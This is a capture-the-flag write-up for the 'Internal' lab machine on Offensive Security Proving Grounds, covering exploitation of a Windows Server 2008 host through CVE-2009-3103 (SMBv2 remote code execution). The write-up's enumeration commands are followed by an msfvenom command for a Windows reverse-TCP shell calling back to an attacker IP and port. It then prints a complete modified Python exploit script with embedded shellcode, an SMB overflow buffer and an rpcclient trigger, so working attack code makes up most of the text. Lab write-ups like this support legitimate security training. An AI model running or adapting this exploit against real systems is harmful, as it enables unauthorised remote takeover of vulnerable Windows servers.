Internal
Writeup for Internal from Offensive Security Proving Grounds (PG)
Information Gathering
Service Enumeration
nmapAutomator.sh -H 192.168.134.40 -t full
SMB
SMB is running and null sessions are allowed.
enum4linux 192.168.134.40Nothing much interesting. Access denied for most queries.
From the scan results we can see the Windows version:
Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-dsThat's pretty old. Let's run a vulnerability scan:
nmapAutomator.sh -H 192.168.134.40 -t vulns
Vulnerability: CVE-2009-3103 (SMBv2 RCE)
Exploit
Generate shellcode:
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.134 LPORT=4444 EXITFUNC=thread -f cAdd the shellcode output to the above exploit code.
Modified exploit code:
1
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
2
​
3
#!/usr/bin/python
4
#This module depends on the linux command line program smbclient.
5
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
6
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
7
import tempfile
8
import sys
9
import subprocess
10
from socket import socket
11
from time import sleep
12
from smb.SMBConnection import SMBConnection
13
​
14
​
15
try:
16
​
17
target = sys.argv[1]
18
except IndexError:
19
print '\nUsage: %s <target ip>\n' % sys.argv[0]
20
print 'Example: MS36299.py 192.168.1.1 1\n'
21
sys.exit(-1)
22
​
23
shell = ("\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
24
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
25
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
26
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
27
"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x8b\x48\x18\x01\xd3\x50"
28
"\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xac"
29
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
30
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
31
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
32
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
33
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
34
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
35
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x31\x86\x68\x02"
36
"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
37
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
38
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
39
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
40
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
41
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
42
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
43
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
44
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
45
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
46
"\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
47
"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
48
​
49
host = target, 445
50
​
51
buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42"
52
buff+="\x72\x00\x00\x00\x00\x18\x53\xc8"
53
buff+="\x17\x02" #high process ID
54
buff+="\x00\xe9\x58\x01\x00\x00"
55
buff+="\x00\x00\x00\x00\x00\x00\x00\x00"
56
buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02"
57
buff+="\x04\x0d\xdf\xff"*25
58
buff+="\x00\x02\x53\x4d"
59
buff+="\x42\x20\x32\x2e\x30\x30\x32\x00"
60
buff+="\x00\x00\x00\x00"*37
61
buff+="\xff\xff\xff\xff"*2
62
buff+="\x42\x42\x42\x42"*7
63
buff+="\xb4\xff\xff\x3f" #magic index
64
buff+="\x41\x41\x41\x41"*6
65
buff+="\x09\x0d\xd0\xff" #return address
66
​
67
#stager_sysenter_hook from metasploit
68
​
69
buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
70
buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d"
71
buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9"
72
buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4"
73
buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a"
74
buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00"
75
buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24"
76
buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10"
77
buff+="\x68\x76\x01\x00\x00\x59\x89\xd8"
78
buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31"
79
buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb"
80
buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d"
81
buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00"
82
buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10"
83
buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0"
84
buff+="\x83\xc2\x04\x81\x22\xff\xff\xff"
85
buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff"
86
buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f"
87
buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18"
88
buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10"
89
buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08"
90
buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73"
91
buff+="\x73\x75\x15\xe8\x07\x00\x00\x00"
92
buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9"
93
buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34"
94
buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff"
95
​
96
buff+=shell
97
​
98
s = socket()
99
s.connect(host)
100
s.send(buff)
101
s.close()
102
#Trigger the above injected code via authenticated process.
103
subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)
Copied!
Use
exploit/multi/handler to handle the staged payload (remember to set the corresponding PAYLOAD and THREAD from msfvenom earlier.)
Last modified 1yr ago
Copy link